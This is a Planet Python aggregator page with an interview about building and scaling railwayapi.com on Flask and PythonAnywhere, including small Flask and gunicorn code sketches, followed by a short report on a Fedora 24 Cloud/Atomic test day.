Python was the language I already knew well, and there were several great libraries available for it, so the decision was very easy for me.

Since the exposed part of the API was just going to be URL views which capture GET requests and return the corresponding JSON, Flask's minimalism made it the most suitable choice; it was enough for what I was doing.
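For illustration, a minimal Flask view of the kind described (a URL view that captures GET parameters and returns JSON) might look like the sketch below; the route and lookup function are hypothetical, not taken from railwayapi.com:

    # Minimal Flask sketch of a GET-parameters-in, JSON-out view.
    from flask import Flask, jsonify, request

    app = Flask(__name__)

    def lookup_route(src, dest):
        # Placeholder for whatever backend actually holds the train data.
        return {"from": src, "to": dest, "trains": []}

    @app.route("/route")
    def route_view():
        src = request.args.get("from")
        dest = request.args.get("to")
        return jsonify(lookup_route(src, dest))

    if __name__ == "__main__":
        app.run()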

What made you choose PythonAnywhere?

This was my first webapp and initially I had very little experience in setting up such an environment. After some research I stumbled upon PythonAnywhere, which was extremely easy to set up, with a nice, clean UI. It also lets you instantly scale up your app by just sliding up the number of workers you need. After that I didn't need to go anywhere else!

Your site quickly became one of our busiest sites -- when did you realise it was getting big? How was the experience of scaling up on PythonAnywhere?

I realized that it was getting big when one of the users complained about load-balancer errors they were getting. But it wasn't an issue, as I quickly scaled up the number of workers and the site was back to normal in seconds.

What kind of traffic did you have last month, for example?

The site got about 19.6 million requests last month! And for the month before that it was about 16 million requests.

You've now decided to move on -- why is that, where did you move to, and was it easy to make the transition?

Yes, I have now moved to a VPS at Digital Ocean. It wasn't an easy decision for me, and it was made only after considerable thought. I loved PythonAnywhere, and I continue to love it, but I needed more flexible configuration, so a VPS was required at this stage.

It was quite difficult to move to a VPS because I had grown accustomed to the ease of use at PythonAnywhere, where everything is already set up and you can just focus on writing your code instead of writing configuration.

In general, what do you think are the pros and cons of PythonAnywhere?

I think I have already mentioned a lot of the pros of PythonAnywhere. But in short, if you just want to focus on building your app rather than setting up the environment, which is how it ideally should be, then there are very few places like PythonAnywhere out there. Developers should also know that setting up an environment is not a one-off process; it requires constant monitoring and changes so that any modification in the code doesn't break the configuration and vice versa. It's quite a time-consuming process, but PythonAnywhere takes care of all of that.

I would have liked it if PA supported asynchronous workers. In fact, this was the main reason for moving: my application is network-I/O bound, so async workers are better suited to the task, and they aren't available here, at least for now.

It would also be great if Redis and WebSockets were supported at some point.
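On the async-worker point above: one common way to get asynchronous workers for a network-I/O-bound Flask/WSGI app on a self-managed VPS is gunicorn's gevent worker class. Below is a sketch of a gunicorn config file (which is plain Python), assuming gunicorn and gevent are installed; the values are illustrative only, not the setup actually used by railwayapi.com:

    # gunicorn.conf.py -- illustrative async-worker setup.
    bind = "0.0.0.0:8000"
    workers = 2               # a couple of processes...
    worker_class = "gevent"   # ...each handling many concurrent connections
    worker_connections = 1000
    # Run with:  gunicorn -c gunicorn.conf.py app:app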

It sounds like the site was a big success. What's next for railwayapi.com?

The goal is to give developers hassle-free access to Indian Railways data. There are some other ideas I am working on, like making train and seat-availability prediction/analytics available through the API.

Do you have any advice for other aspiring web developers?

I am still learning a lot myself!

Although I can say from my experience that the most important thing I learned while developing the API was that engineering your app to be scalable is one of the most challenging tasks, and one that is often overlooked by people at the beginning.

I had to rewrite several of the modules several times because they were 'hacky' code, and as the pressure on the site grew they started to break. So it would be good if developers also thought about how their app will respond to such scenarios in the future.

Thanks again Kaustubh, and best of luck with the future of the project!

by Planet Python at 2016-05-12 12:44

Kushal Das: Report: Fedora 24 Cloud/Atomic test day - Planet Python

Last Tuesday we had a Fedora 24 test day for the Fedora Cloud and Atomic images. With help from Adam Williamson I managed to set up the test day. This was the first time I had used the test day web app, where users can enter the results of their tests.

Sayan helped to get us the list of AMI(s) for the Cloud base image. We also found our first bug of this test day here; it was not an issue in the images, but in fedimg. fedimg is the application which creates the AMI(s) in an automated way, and it was creating AMI(s) for the atomic images. Today Sayan applied a hotfix for the same; I hope this will take care of the issue.

While testing the Atomic image, I found that docker was not working in it, though it worked in the Cloud base image. I filed a bug on the same; it seems we had already found the root cause in another bug. The other major issue was that upgrading the Atomic image failed, which was also a known issue.

In total, 13 people from the Fedora QA and Cloud SIG groups volunteered for the test day. It was a successful event as we found some major issues, though of course we would be happier to have no issues at all :)

by Planet Python at 2016-05-12 12:00